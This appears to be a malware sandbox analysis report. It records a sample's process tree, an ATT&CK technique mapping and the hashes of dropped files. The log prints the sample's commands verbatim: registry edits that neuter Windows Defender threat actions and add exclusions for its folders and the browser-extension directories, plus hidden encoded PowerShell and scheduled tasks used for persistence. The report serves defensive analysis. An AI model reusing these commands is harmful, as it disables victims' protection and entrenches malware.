"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:6476

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:3836

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:5640

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:6468

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:5472

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:5400

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:5496

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:5504

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:6700

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:5524

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:6496

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:6840

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:6872

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:6884

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:6936

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:3012

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:7164

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:6240

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:5548

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:5932

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
3⤵
PID:5676

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
3⤵
PID:6264

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
3⤵
PID:2636

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
3⤵
PID:6100

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"
2⤵
PID:3224

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5848

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2452

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:7000

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:888

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:7004

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:6620

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1584

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3012

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4092

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:6760

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:5388

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:6436

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:2492

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3196

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:7024

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1148

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4336

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:32
3⤵
PID:3384

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:64
3⤵
PID:5804

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:32
3⤵
PID:6084

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:64
3⤵
PID:5384

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gbAIJQIdG" /SC once /ST 01:01:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:6572

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gbAIJQIdG"
2⤵
PID:5392

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gbAIJQIdG"
2⤵
PID:6868

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 04:51:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\npleHdM.exe\" GH /jQgididSN 385118 /S" /V1 /F
2⤵
- Creates scheduled task(s)
PID:7024

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "XyyyteIMwZeutaZuw"
2⤵
PID:6084

C:\Users\Admin\AppData\Local\Temp\7zS9C2B.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS9C2B.tmp\Install.exe it /tWididjgmG 385118 /S
1⤵
PID:5800

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
2⤵
PID:6336

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
3⤵
PID:6800

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
4⤵
PID:6924

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:7092

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
3⤵
PID:4864

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
4⤵
PID:5964

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:3880

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
3⤵
PID:952

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
4⤵
PID:928

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:5336

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
3⤵
PID:5388

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
4⤵
PID:4092

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:4644

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
PID:5468

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
4⤵
PID:7132

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
- Command and Scripting Interpreter: PowerShell
PID:7044

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
6⤵
PID:5908

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:3500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 952 -ip 952
1⤵
PID:3196

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:5144

C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\npleHdM.exe
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\npleHdM.exe GH /jQgididSN 385118 /S
1⤵
PID:6380

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Are.docx
Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\mozglue.dll
Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll
Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
